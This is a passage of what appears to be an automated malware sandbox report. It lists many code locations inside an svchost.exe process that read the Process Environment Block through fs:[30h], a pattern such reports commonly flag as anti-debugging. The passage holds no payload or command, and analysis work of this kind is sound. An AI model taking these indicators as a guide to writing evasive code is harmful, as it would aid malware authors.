            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EA250 mov eax, dword ptr fs:[00000030h]1_2_038EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03834260 mov eax, dword ptr fs:[00000030h]1_2_03834260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03834260 mov eax, dword ptr fs:[00000030h]1_2_03834260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03834260 mov eax, dword ptr fs:[00000030h]1_2_03834260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382826B mov eax, dword ptr fs:[00000030h]1_2_0382826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03870185 mov eax, dword ptr fs:[00000030h]1_2_03870185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EC188 mov eax, dword ptr fs:[00000030h]1_2_038EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EC188 mov eax, dword ptr fs:[00000030h]1_2_038EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D4180 mov eax, dword ptr fs:[00000030h]1_2_038D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D4180 mov eax, dword ptr fs:[00000030h]1_2_038D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B019F mov eax, dword ptr fs:[00000030h]1_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B019F mov eax, dword ptr fs:[00000030h]1_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B019F mov eax, dword ptr fs:[00000030h]1_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B019F mov eax, dword ptr fs:[00000030h]1_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382A197 mov eax, dword ptr fs:[00000030h]1_2_0382A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382A197 mov eax, dword ptr fs:[00000030h]1_2_0382A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382A197 mov eax, dword ptr fs:[00000030h]1_2_0382A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F61C3 mov eax, dword ptr fs:[00000030h]1_2_038F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F61C3 mov eax, dword ptr fs:[00000030h]1_2_038F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h]1_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h]1_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h]1_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h]1_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039061E5 mov eax, dword ptr fs:[00000030h]1_2_039061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038601F8 mov eax, dword ptr fs:[00000030h]1_2_038601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DA118 mov ecx, dword ptr fs:[00000030h]1_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DA118 mov eax, dword ptr fs:[00000030h]1_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DA118 mov eax, dword ptr fs:[00000030h]1_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DA118 mov eax, dword ptr fs:[00000030h]1_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F0115 mov eax, dword ptr fs:[00000030h]1_2_038F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03860124 mov eax, dword ptr fs:[00000030h]1_2_03860124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h]1_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h]1_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C4144 mov ecx, dword ptr fs:[00000030h]1_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h]1_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h]1_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382C156 mov eax, dword ptr fs:[00000030h]1_2_0382C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C8158 mov eax, dword ptr fs:[00000030h]1_2_038C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836154 mov eax, dword ptr fs:[00000030h]1_2_03836154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836154 mov eax, dword ptr fs:[00000030h]1_2_03836154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904164 mov eax, dword ptr fs:[00000030h]1_2_03904164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904164 mov eax, dword ptr fs:[00000030h]1_2_03904164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383208A mov eax, dword ptr fs:[00000030h]1_2_0383208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038280A0 mov eax, dword ptr fs:[00000030h]1_2_038280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C80A8 mov eax, dword ptr fs:[00000030h]1_2_038C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F60B8 mov eax, dword ptr fs:[00000030h]1_2_038F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F60B8 mov ecx, dword ptr fs:[00000030h]1_2_038F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B20DE mov eax, dword ptr fs:[00000030h]1_2_038B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0382A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038380E9 mov eax, dword ptr fs:[00000030h]1_2_038380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B60E0 mov eax, dword ptr fs:[00000030h]1_2_038B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382C0F0 mov eax, dword ptr fs:[00000030h]1_2_0382C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038720F0 mov ecx, dword ptr fs:[00000030h]1_2_038720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B4000 mov ecx, dword ptr fs:[00000030h]1_2_038B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h]1_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h]1_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h]1_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h]1_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382A020 mov eax, dword ptr fs:[00000030h]1_2_0382A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382C020 mov eax, dword ptr fs:[00000030h]1_2_0382C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C6030 mov eax, dword ptr fs:[00000030h]1_2_038C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03832050 mov eax, dword ptr fs:[00000030h]1_2_03832050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6050 mov eax, dword ptr fs:[00000030h]1_2_038B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385C073 mov eax, dword ptr fs:[00000030h]1_2_0385C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D678E mov eax, dword ptr fs:[00000030h]1_2_038D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038307AF mov eax, dword ptr fs:[00000030h]1_2_038307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E47A0 mov eax, dword ptr fs:[00000030h]1_2_038E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383C7C0 mov eax, dword ptr fs:[00000030h]1_2_0383C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B07C3 mov eax, dword ptr fs:[00000030h]1_2_038B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038527ED mov eax, dword ptr fs:[00000030h]1_2_038527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038527ED mov eax, dword ptr fs:[00000030h]1_2_038527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038527ED mov eax, dword ptr fs:[00000030h]1_2_038527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BE7E1 mov eax, dword ptr fs:[00000030h]1_2_038BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038347FB mov eax, dword ptr fs:[00000030h]1_2_038347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038347FB mov eax, dword ptr fs:[00000030h]1_2_038347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C700 mov eax, dword ptr fs:[00000030h]1_2_0386C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830710 mov eax, dword ptr fs:[00000030h]1_2_03830710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03860710 mov eax, dword ptr fs:[00000030h]1_2_03860710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C720 mov eax, dword ptr fs:[00000030h]1_2_0386C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C720 mov eax, dword ptr fs:[00000030h]1_2_0386C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386273C mov eax, dword ptr fs:[00000030h]1_2_0386273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386273C mov ecx, dword ptr fs:[00000030h]1_2_0386273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386273C mov eax, dword ptr fs:[00000030h]1_2_0386273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AC730 mov eax, dword ptr fs:[00000030h]1_2_038AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386674D mov esi, dword ptr fs:[00000030h]1_2_0386674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386674D mov eax, dword ptr fs:[00000030h]1_2_0386674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386674D mov eax, dword ptr fs:[00000030h]1_2_0386674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830750 mov eax, dword ptr fs:[00000030h]1_2_03830750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BE75D mov eax, dword ptr fs:[00000030h]1_2_038BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872750 mov eax, dword ptr fs:[00000030h]1_2_03872750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872750 mov eax, dword ptr fs:[00000030h]1_2_03872750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B4755 mov eax, dword ptr fs:[00000030h]1_2_038B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838770 mov eax, dword ptr fs:[00000030h]1_2_03838770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03834690 mov eax, dword ptr fs:[00000030h]1_2_03834690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03834690 mov eax, dword ptr fs:[00000030h]1_2_03834690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C6A6 mov eax, dword ptr fs:[00000030h]1_2_0386C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038666B0 mov eax, dword ptr fs:[00000030h]1_2_038666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0386A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A6C7 mov eax, dword ptr fs:[00000030h]1_2_0386A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h]1_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h]1_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h]1_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h]1_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B06F1 mov eax, dword ptr fs:[00000030h]1_2_038B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B06F1 mov eax, dword ptr fs:[00000030h]1_2_038B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE609 mov eax, dword ptr fs:[00000030h]1_2_038AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872619 mov eax, dword ptr fs:[00000030h]1_2_03872619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E627 mov eax, dword ptr fs:[00000030h]1_2_0384E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03866620 mov eax, dword ptr fs:[00000030h]1_2_03866620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03868620 mov eax, dword ptr fs:[00000030h]1_2_03868620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383262C mov eax, dword ptr fs:[00000030h]1_2_0383262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384C640 mov eax, dword ptr fs:[00000030h]1_2_0384C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F866E mov eax, dword ptr fs:[00000030h]1_2_038F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F866E mov eax, dword ptr fs:[00000030h]1_2_038F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A660 mov eax, dword ptr fs:[00000030h]1_2_0386A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A660 mov eax, dword ptr fs:[00000030h]1_2_0386A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03862674 mov eax, dword ptr fs:[00000030h]1_2_03862674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03832582 mov eax, dword ptr fs:[00000030h]1_2_03832582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03832582 mov ecx, dword ptr fs:[00000030h]1_2_03832582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03864588 mov eax, dword ptr fs:[00000030h]1_2_03864588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E59C mov eax, dword ptr fs:[00000030h]1_2_0386E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B05A7 mov eax, dword ptr fs:[00000030h]1_2_038B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B05A7 mov eax, dword ptr fs:[00000030h]1_2_038B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B05A7 mov eax, dword ptr fs:[00000030h]1_2_038B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038545B1 mov eax, dword ptr fs:[00000030h]1_2_038545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038545B1 mov eax, dword ptr fs:[00000030h]1_2_038545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E5CF mov eax, dword ptr fs:[00000030h]1_2_0386E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E5CF mov eax, dword ptr fs:[00000030h]1_2_0386E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038365D0 mov eax, dword ptr fs:[00000030h]1_2_038365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A5D0 mov eax, dword ptr fs:[00000030h]1_2_0386A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A5D0 mov eax, dword ptr fs:[00000030h]1_2_0386A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038325E0 mov eax, dword ptr fs:[00000030h]1_2_038325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C5ED mov eax, dword ptr fs:[00000030h]1_2_0386C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C5ED mov eax, dword ptr fs:[00000030h]1_2_0386C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C6500 mov eax, dword ptr fs:[00000030h]1_2_038C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]1_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]1_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]1_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]1_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]1_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838550 mov eax, dword ptr fs:[00000030h]1_2_03838550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838550 mov eax, dword ptr fs:[00000030h]1_2_03838550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386656A mov eax, dword ptr fs:[00000030h]1_2_0386656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386656A mov eax, dword ptr fs:[00000030h]1_2_0386656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386656A mov eax, dword ptr fs:[00000030h]1_2_0386656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EA49A mov eax, dword ptr fs:[00000030h]1_2_038EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038364AB mov eax, dword ptr fs:[00000030h]1_2_038364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038644B0 mov ecx, dword ptr fs:[00000030h]1_2_038644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BA4B0 mov eax, dword ptr fs:[00000030h]1_2_038BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038304E5 mov ecx, dword ptr fs:[00000030h]1_2_038304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03868402 mov eax, dword ptr fs:[00000030h]1_2_03868402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03868402 mov eax, dword ptr fs:[00000030h]1_2_03868402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03868402 mov eax, dword ptr fs:[00000030h]1_2_03868402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E420 mov eax, dword ptr fs:[00000030h]1_2_0382E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E420 mov eax, dword ptr fs:[00000030h]1_2_0382E420
